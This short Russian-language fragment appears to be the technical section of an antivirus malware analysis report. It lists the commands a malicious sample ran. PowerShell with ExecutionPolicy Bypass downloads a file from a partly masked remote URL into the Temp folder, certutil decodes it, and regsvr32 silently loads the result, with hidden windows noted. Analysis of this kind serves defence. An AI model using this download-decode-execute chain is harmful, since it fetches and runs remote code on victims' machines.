Техническая информация
- http://op#####.#sobcertification.com/extracert/index.php как c:\users\arrow\appdata\local\temp\1x.txt
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy ByPass -WindowStyle Normal (New-Object System.Net.WebClient).DownloadFile('http://op#####.#sobcertification.com/extracert/index.php','C:\Users\arrow\AppData\Local\Temp\1x.txt')' (со скрытым окном)
- '<SYSTEM32>\certutil.exe' -decode C:\Users\arrow\AppData\Local\Temp\1x.txt C:\Users\arrow\AppData\Local\Temp\2x.dat' (со скрытым окном)
- '<SYSTEM32>\regsvr32.exe' /s /i C:\Users\arrow\AppData\Local\Temp\2x.dat' (со скрытым окном)
- '<SYSTEM32>\certutil.exe' -decode C:\Users\arrow\AppData\Local\Temp\1x.txt C:\Users\arrow\AppData\Local\Temp\2x.dat
- '<SYSTEM32>\regsvr32.exe' /s /i C:\Users\arrow\AppData\Local\Temp\2x.dat